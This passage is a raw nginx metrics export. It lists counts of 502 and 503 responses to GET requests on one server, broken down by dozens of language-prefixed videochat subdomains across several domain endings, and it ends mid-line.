nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uk.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uk.videochat.tv.br"} 193 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uk.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ur.videochat.cafe"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="ur.videochat.tv.br"} 162 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uz.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uz.videochat.date"} 4 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uz.videochat.tv.br"} 181 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="uz.videochat.world"} 43 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="vi.videochat.cafe"} 12 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="vi.videochat.date"} 5 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="vi.videochat.tv.br"} 167 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="vi.videochat.world"} 6 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="videochat.cafe"} 179 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="videochat.date"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="videochat.tv.br"} 487 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="videochat.world"} 85 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="xh.videochat.cafe"} 13 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="xh.videochat.date"} 8 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="xh.videochat.tv.br"} 188 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="xh.videochat.world"} 26 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="yi.videochat.date"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="yi.videochat.tv.br"} 17 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="yi.videochat.world"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="zh.videochat.tv.br"} 114 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="502",vhost="zh.videochat.world"} 2 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="-"} 1 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="161.97.120.25"} 2289 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="3.0.3"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="43822297-98c3-4c96-b5b8-6a4c4675d440.videochat.mx"} 14 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="5.7.31-0ubuntu0.18.04.1"} 15 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="admin.videochat.mx"} 190 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="af.videochat.cafe"} 672 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="af.videochat.date"} 275 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="af.videochat.mx"} 6892 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="af.videochat.show"} 222 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="af.videochat.tv.br"} 2998 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="af.videochat.world"} 658 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="al.videochat.cafe"} 1042 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="al.videochat.date"} 435 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="al.videochat.mx"} 3711 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="al.videochat.show"} 351 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="al.videochat.tv.br"} 2434 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="al.videochat.world"} 908 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="am.videochat.cafe"} 1691 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="am.videochat.date"} 769 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="am.videochat.mx"} 38 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="am.videochat.show"} 350 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="am.videochat.tv.br"} 3597 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="am.videochat.world"} 1064 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="api.videochat.mx"} 200 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="app.videochat.mx"} 109 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ar.videochat.cafe"} 1457 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ar.videochat.date"} 572 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ar.videochat.mx"} 130 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ar.videochat.show"} 625 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ar.videochat.tv.br"} 3623 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ar.videochat.world"} 1127 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="az.videochat.cafe"} 1239 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="az.videochat.date"} 349 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="az.videochat.mx"} 2119 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="az.videochat.show"} 308 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="az.videochat.tv.br"} 3281 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="az.videochat.world"} 761 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ba.videochat.cafe"} 3406 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ba.videochat.date"} 844 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ba.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ba.videochat.show"} 477 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ba.videochat.tv.br"} 3674 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ba.videochat.world"} 1148 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="backend.videochat.mx"} 129 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="be.videochat.cafe"} 2658 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="be.videochat.date"} 705 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="be.videochat.mx"} 47 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="be.videochat.show"} 926 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="be.videochat.tv.br"} 2857 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="be.videochat.world"} 1671 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bg.videochat.cafe"} 2845 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bg.videochat.date"} 1182 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bg.videochat.mx"} 44 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bg.videochat.show"} 1424 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bg.videochat.tv.br"} 3228 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bg.videochat.world"} 1505 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bn.videochat.cafe"} 1570 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bn.videochat.date"} 530 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bn.videochat.mx"} 36 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bn.videochat.show"} 800 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bn.videochat.tv.br"} 3344 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bn.videochat.world"} 998 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bs.videochat.cafe"} 1437 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bs.videochat.date"} 264 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bs.videochat.mx"} 5322 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bs.videochat.show"} 233 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bs.videochat.tv.br"} 3515 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="bs.videochat.world"} 792 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ca.videochat.cafe"} 1007 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ca.videochat.date"} 247 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ca.videochat.mx"} 5264 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ca.videochat.show"} 304 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ca.videochat.tv.br"} 3423 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ca.videochat.world"} 793 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ceb.videochat.cafe"} 691 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ceb.videochat.date"} 243 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ceb.videochat.mx"} 6963 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ceb.videochat.show"} 641 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ceb.videochat.tv.br"} 2923 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ceb.videochat.world"} 588 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="chm.videochat.cafe"} 2542 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="chm.videochat.date"} 866 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="chm.videochat.mx"} 34 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="chm.videochat.show"} 570 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="chm.videochat.tv.br"} 3630 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="chm.videochat.world"} 1834 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cs.videochat.cafe"} 1388 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cs.videochat.date"} 1113 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cs.videochat.mx"} 3171 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cs.videochat.show"} 283 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cs.videochat.tv.br"} 3831 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cs.videochat.world"} 1078 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cy.videochat.cafe"} 766 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cy.videochat.date"} 259 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cy.videochat.mx"} 7165 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cy.videochat.show"} 202 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cy.videochat.tv.br"} 3374 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="cy.videochat.world"} 557 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="da.videochat.cafe"} 864 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="da.videochat.date"} 677 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="da.videochat.mx"} 5766 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="da.videochat.show"} 335 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="da.videochat.tv.br"} 3593 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="da.videochat.world"} 721 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="de.videochat.cafe"} 5404 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="de.videochat.date"} 208 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="de.videochat.mx"} 7404 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="de.videochat.show"} 292 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="de.videochat.tv.br"} 3605 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="de.videochat.world"} 5747 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="demo.videochat.mx"} 135 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="dev.videochat.mx"} 273 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ee.videochat.cafe"} 1156 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ee.videochat.date"} 787 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ee.videochat.mx"} 5615 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ee.videochat.show"} 217 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ee.videochat.tv.br"} 3560 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ee.videochat.world"} 595 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="el.videochat.cafe"} 1607 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="el.videochat.date"} 497 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="el.videochat.mx"} 166 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="el.videochat.show"} 343 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="el.videochat.tv.br"} 3886 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="el.videochat.world"} 1000 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="en.videochat.cafe"} 771 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="en.videochat.mx"} 6728 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="en.videochat.tv.br"} 3147 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eo.videochat.cafe"} 934 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eo.videochat.date"} 242 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eo.videochat.mx"} 7042 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eo.videochat.show"} 151 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eo.videochat.tv.br"} 3182 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eo.videochat.world"} 565 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="es.videochat.cafe"} 981 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="es.videochat.date"} 685 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="es.videochat.show"} 738 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="es.videochat.tv.br"} 3952 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="es.videochat.world"} 705 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="et.videochat.cafe"} 1189 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="et.videochat.date"} 336 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="et.videochat.mx"} 32 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="et.videochat.show"} 1454 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="et.videochat.tv.br"} 3499 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="et.videochat.world"} 632 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eu.videochat.cafe"} 683 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eu.videochat.date"} 221 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eu.videochat.mx"} 6813 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eu.videochat.show"} 174 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eu.videochat.tv.br"} 2526 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="eu.videochat.world"} 601 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fa.videochat.cafe"} 1409 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fa.videochat.date"} 540 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fa.videochat.mx"} 64 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fa.videochat.show"} 440 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fa.videochat.tv.br"} 3750 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fa.videochat.world"} 1027 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fi.videochat.cafe"} 1029 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fi.videochat.date"} 814 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fi.videochat.mx"} 10031 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fi.videochat.show"} 196 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fi.videochat.tv.br"} 3154 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fi.videochat.world"} 593 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fr.videochat.cafe"} 161 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fr.videochat.date"} 2050 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fr.videochat.mx"} 8197 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fr.videochat.show"} 685 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fr.videochat.tv.br"} 3541 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="fr.videochat.world"} 828 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ga.videochat.cafe"} 1743 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ga.videochat.date"} 954 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ga.videochat.mx"} 2791 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ga.videochat.show"} 388 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ga.videochat.tv.br"} 3660 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ga.videochat.world"} 1087 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gl.videochat.cafe"} 1292 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gl.videochat.date"} 317 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gl.videochat.mx"} 6026 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gl.videochat.show"} 405 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gl.videochat.tv.br"} 3935 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gl.videochat.world"} 892 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gu.videochat.cafe"} 1409 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gu.videochat.date"} 508 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gu.videochat.mx"} 86 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gu.videochat.show"} 498 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gu.videochat.tv.br"} 4004 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="gu.videochat.world"} 1217 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="he.videochat.cafe"} 1536 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="he.videochat.date"} 956 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="he.videochat.mx"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="he.videochat.show"} 430 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="he.videochat.tv.br"} 3982 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="he.videochat.world"} 932 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hi.videochat.cafe"} 1852 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hi.videochat.date"} 1038 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hi.videochat.mx"} 39 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hi.videochat.show"} 457 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hi.videochat.tv.br"} 3864 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hi.videochat.world"} 1016 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hr.videochat.cafe"} 1142 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hr.videochat.date"} 765 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hr.videochat.mx"} 4978 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hr.videochat.show"} 960 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hr.videochat.tv.br"} 3249 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hr.videochat.world"} 539 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ht.videochat.cafe"} 989 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ht.videochat.date"} 340 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ht.videochat.mx"} 7065 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ht.videochat.show"} 726 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ht.videochat.tv.br"} 3205 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ht.videochat.world"} 496 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hu.videochat.cafe"} 2787 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hu.videochat.date"} 852 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hu.videochat.mx"} 1512 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hu.videochat.show"} 884 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hu.videochat.tv.br"} 4232 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="hu.videochat.world"} 896 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="id.videochat.cafe"} 664 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="id.videochat.date"} 176 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="id.videochat.mx"} 7731 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="id.videochat.show"} 683 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="id.videochat.tv.br"} 2643 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="id.videochat.world"} 501 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="is.videochat.cafe"} 3262 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="is.videochat.date"} 1238 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="is.videochat.mx"} 1670 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="is.videochat.show"} 387 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="is.videochat.tv.br"} 3300 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="is.videochat.world"} 1017 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="it.videochat.cafe"} 842 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="it.videochat.date"} 650 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="it.videochat.mx"} 5866 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="it.videochat.show"} 293 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="it.videochat.tv.br"} 3111 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="it.videochat.world"} 486 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jp.videochat.cafe"} 1364 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jp.videochat.date"} 1033 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jp.videochat.mx"} 55 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jp.videochat.show"} 351 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jp.videochat.tv.br"} 3819 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jp.videochat.world"} 973 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jv.videochat.cafe"} 668 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jv.videochat.date"} 222 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jv.videochat.mx"} 8620 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jv.videochat.show"} 714 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jv.videochat.tv.br"} 3040 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="jv.videochat.world"} 297 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ka.videochat.cafe"} 1607 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ka.videochat.date"} 493 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ka.videochat.mx"} 42 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ka.videochat.show"} 377 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ka.videochat.tv.br"} 3727 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="ka.videochat.world"} 705 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kk.videochat.cafe"} 4720 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kk.videochat.date"} 1018 nginx_http_response_count_total{app="web",host="161.97.120.25",method="GET",status="503",vhost="kk.videochat.mx"} 